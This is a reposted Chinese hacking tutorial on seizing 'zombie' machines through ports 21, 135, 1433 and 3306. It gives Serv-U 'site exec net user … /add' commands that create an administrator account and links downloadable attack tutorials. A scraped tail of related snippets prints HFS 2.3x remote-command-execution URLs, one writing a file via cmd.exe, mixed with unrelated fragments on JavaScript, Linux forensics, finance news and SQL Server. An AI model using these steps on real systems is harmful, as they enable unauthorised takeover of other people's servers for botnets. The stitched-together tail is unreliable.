很早以前的抓鸡资料【转载】

一、21端口
1、简介
这个端口的抓鸡主要用的就是Server-U的漏洞,因为Server-U默认是以SYSTEM权限运行的,所以它就拥有SYSTEM级别的权限,这个权限比administrator还要大,所以你能做的事情比管理员还多。
2、第一步,扫描端口
首先是扫描开放了21端口的机器,这是所有端口入侵的前奏,所有的端口入侵都是先扫端口再入侵的。
扫描完毕之后整理结果,这些我就不多说了。
3、第二步,探测弱口令
探测弱口令的工具,你可以用X-Scan,也可以用Hscan,这两款工具都不错,我个人比较推荐Hscan,它很小巧灵活。
4、第三步,判断FTP服务器软件的类型
在第二步中,我们得到了FTP服务器的弱口令,这些将是我们进行下一步的目标。
因为我们要找的是Server-U搭建的FTP服务器,所以我们应该把使用其他软件搭建的FTP服务器都过滤掉,过滤的方法是,手工在DOS下连接上扫出了弱口令的IP,看一下登陆时的提示信息,如果其中有Server-U字样,那就说明或许可以利用,你就把这个IP记录下来,留待后用,如果没有这种提示,那就说明不可利用,那就扔掉。
5、第四步,利用上面得到的信息得到肉鸡
在DOS下,登录上扫出弱口令的并且是Server-U的IP,然后执行这两条命令:
Quote site exec net user yf4n 123 /add
Quote site exec net localgroup administrators yf4n /add
第一条命令的意思是,添加一个用户名为yf4n,密码为123的用户,第二条的意思是,将名为yf4n的用户设置成管理员。
在实际情况中,你可以把命令中的用户名和密码改掉。
这样,你就有了具有管理员权限的账户和密码了,接下来是连3389登录,还是直接Recton个远控上去,那就看你个人发挥了。
二、135端口
1、简介
这个135端口一度很火,有不少人日日夜夜不停的扫着,也有不少人日日夜夜不停的盼着自己也能扫,其实135端口的入侵很简单,只不过有不少地区的电信公司或网通公司都把这个端口给屏蔽了,你的扫描器发出的对这个端口的探测数据包,都被直接丢弃了,所以你的扫描器接收不到任何返回,自然也就扫不出开放了135端口的IP。
其实,每台机器都开了135端口,包括我自己,但是能利用的却不多,为什么,因为这个端口的入侵也必须用到弱口令,如果你的机器没有弱口令,那么即使你开了135,也是不会被入侵的。
2、第一步,扫描端口
要想本机扫135,可能会很麻烦,如果想了解,可以看一下这个:
http://tieba.baidu.com/f?kz=241986425
这篇文章写的不错,可以看一下,这篇文章可以解决因为本机系统问题导致扫不到的问题,但是解决不了电信屏蔽的问题,如果你发现自己的系统已经完全没有限制,但是还是扫不到135,那就是被屏蔽了。
被屏蔽的解决办法:
1、自己搞一台服务器,在服务器上扫,但是我自己在很多服务器都试过,到现在为止,能扫的还真不多,一切原因都是因为电信的屏蔽。
2、找一个VPN,这个VPN可以找免费的,也可以买一个,都可以,但是这种方法也不是一定可行的,为什么呢,因为如果你挂了VPN的话,那么你的扫描的数据包都是从VPN服务器上出去的,但是,如果这台服务器也是处于被屏蔽的范围内,那你也是不能扫的,这是一个原理,想通了你就什么都明白了。
第二步,探测弱口令
这个没有什么好说的,略过。
第三步,利用上面得到的信息得到肉鸡
这个步骤使用Recton.exe就可以完成,很简单,网上教程也很多,这里略过。
三、1433端口
1、简介
1433端口是MSSQL提供的对外连接所用的端口,我们的思路就是通过这个端口连接到运行了SQL服务的服务器上,然后执行添加管理员账户或者执行其他操作。
MSSQL也是以SYSTEM权限运行的,权限也很高。
2、利用方法
这个端口的入侵涉及到的东西更多,是我这篇文章要讲的这几种端口入侵中最复杂的一种,但是用这个端口抓到的肉鸡质量也比其他端口抓到的质量高,因为开放了1433端口的一般都是服务器,不是个人电脑。
因为它涉及的东西更多,所以我自己就不讲了,不过我给我的徒弟做的关于这个端口的系列教程不能公布,我这里就发一些其他的朋友做的这方面的教程吧,有10节课,讲的很好,下载地址:
http://soft1.hongke-vip.com/2010/donghua/tq/1433tq1.rar
http://soft1.hongke-vip.com/2010/donghua/tq/1433tq2.rar
http://soft1.hongke-vip.com/2010/donghua/tq/1433tq3.rar
http://soft1.hongke-vip.com/2010/donghua/tq/1433tq4.rar
http://soft1.hongke-vip.com/2010/donghua/tq/1433tq5.rar
http://soft1.hongke-vip.com/2010/donghua/tq/1433tq6.rar
http://soft1.hongke-vip.com/2010/donghua/tq/1433tq7.rar
http://soft1.hongke-vip.com/2010/donghua/tq/1433tq8.rar
http://soft1.hongke-vip.com/2010/donghua/tq/1433tq9.rar
http://soft1.hongke-vip.com/2010/donghua/tq/1433tq10.rar
四、3306端口
1、简介
这个端口是MYSQL开放的外连端口,虽然抓起来效率不是很高,但是也算是比较好抓了。
2、利用方法
这个端口的利用方法有点复杂,需要注意到的地方比较多,这篇文章限于篇幅,并且并不是视频教程,如果是视频教程,那讲起来会容易很多,所以不准备详细说,想了解的朋友可以看一下这个教程:
http://www.heibai.net/tools/donghua09/3306wcsdzj.rar
这个教程只讲了方法没讲原理,不过总体来说还不错。
五、3389端口弱口令
时间: 2024-08-09 20:44:14

很早以前的抓鸡资料【转载】的相关文章

HFS 2.3x 远程命令执行(抓鸡黑客末日)

从某论坛看见的,转载部分: 这个程序在国内用的特别多,特别是那些抓肉鸡的黑阔. http://localhost:80/?search==%00{.exec|cmd.} http://localhost:80/search=%00{.exec|cmd.} 注:有些版本search前面是没有?的. 测试部分: 百度搜HFS默认就是2.3x版本,执行echo测试成功: http://localhost:8080/?search==%00{.exec|cmd.exe%20/c%20echo>c:/1.

回顾HFS 2.3x 远程命令执行,抓鸡黑客的“末日”(CVE2014-6287)

去年HFS 2.3x 远程命令执行让很多人遭殃了,尤其是一部分黑客,因为很多批量养鸡的黑客都爱用它,于是乎,辛辛苦苦抓的肉鸡就与人分享了.我们分析漏洞得知由于正则表达式的问题,导致了远程代码的执行. 下面我们来本地测试一下这个漏洞的威力,为什么过了大半年还提它?因为今天随便搜了一下,用这个版本的国内还有很多,涉及到部分"抓鸡黑客"(现在还在用这个版本的估计是小菜),学校等.有趣的是,用hfs的服务器一般都开启了3389,罪恶啊.如下图. google上可以搜到更多的主机. 随便测试几个

韩老师的乌龟抓鸡

判断两个图片接近的时候用了绝对值的算法 1 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> 2 <html> 3 <head> 4 <title> 004 </title> 5 <script type="text/javascript

国外软件HFS 2.3x 远程命令执行漏洞 (本程序某些YY黑阔大牛抓鸡抓IP工具中使用到本软件)本站教程教习如何梨园远程命令执行。。中国寒龙

这个程序在国内用的特别多,特别是那些抓肉鸡的黑阔. 1 2 http://localhost:80/?search==%00{.exec|cmd.} http://localhost:80/search=%00{.exec|cmd.} 注:有些版本search前面是没有?的. 测试部分:百度搜HFS默认就是2.3x版本,执行echo测试成功: 1 http://localhost:8080/?search==%00{.exec|cmd.exe%20/c%20echo>c:/1.txt%20123

抓鸡直播截图(南非蚂蚁巨作)

首先登录系统,通过top命令检查系统整体情况 发现第一个进程占用很大cpu资源,肯定有问题 从文件名看出,这不像是一个正常的系统进程 通过进程id判断出执行文件的位置,操作如下: 进一步查看/usr/bin下的文件信息 看第一个文件,非常异常,主要看文件属性 继续通过ps命令查看系统进程,发现 看加壳程序 /usr/bin/dpkgd/ps -ef 看到了吗,这些都是加壳伪装的命令 ps命令看到的其实已经是假象了 然后在看看crontab是否有守护进程信息 发现有异样,看那个kill.sh进程,

android jni 学习之一 &lt;资料转载&gt;

先把自己找的资料贴在这里,感谢作者分享! http://blog.csdn.net/jianguo_liao19840726/article/details/6719224 简而言之: 1 android(java)代码中的本地方法列表(c/c++ 库提供的API),示例如下: public class DataProvider { private static final class DataProviderHolder { private static final DataProvider

沅陵金融改革 全县上下抢抓“鸡遇”q

上述评论文章认为,解决传统观念上的问题,还得从转变思想上下功夫.当务之急,是要出台好的政策,保证妇女在各方面能取得和男性平等的权益,让"男女平等"."生男生女都一样"的观念逐渐在乡村扎根.在此基础之上,扭转男女比例失调,破除嫁女"待价而沽"等顽疾才会看到希望.(吕春荣) 都是为了成片效果 葡总理科斯塔表示,苏亚雷斯毕生为反对独裁和自由而斗争,他在葡萄牙的历史地位无人可以替代. 同时,加快棚户区改造,全年完成城市棚户区改造4.74万户.农村危房改造

搜索引擎蜘蛛及网站robots.txt文件详解[转载]

我们知道,搜索引擎都有自己的“搜索机器人”(ROBOTS),并通过这些ROBOTS在网络上沿着网页上的链接(一般是http和src链接)不断抓取资料建立自己的数据库. 对于网站管理者和内容提供者来说,有时候会有一些站点内容,不希望被ROBOTS抓取而公开.为了解决这个问题,ROBOTS开发界提供了两个办法:一个是robots.txt,另一个是TheRobotsMETA标签. 注意:robots.txt写法是否正确对搜索引擎抓取网站至关重要,我们尽量按照标准的格式写语句,否则出现的错误可能会导致搜

我是如何在SQLServer中处理每天四亿三千万记录的(转)

首先声明,我只是个程序员,不是专业的DBA,以下这篇文章是从一个问题的解决过程去写的,而不是一开始就给大家一个正确的结果,如果文中有不对的地方,请各位数据库大牛给予指正,以便我能够更好的处理此次业务. 项目背景 这是给某数据中心做的一个项目,项目难度之大令人发指,这个项目真正的让我感觉到了,商场如战场,而我只是其中的一个小兵,太多的战术,太多的高层之间的较量,太多的内幕了.具体这个项目的情况,我有空再写相关的博文出来. 这个项目是要求做环境监控,我们暂且把受监控的设备称为采集设备,采集设备的属性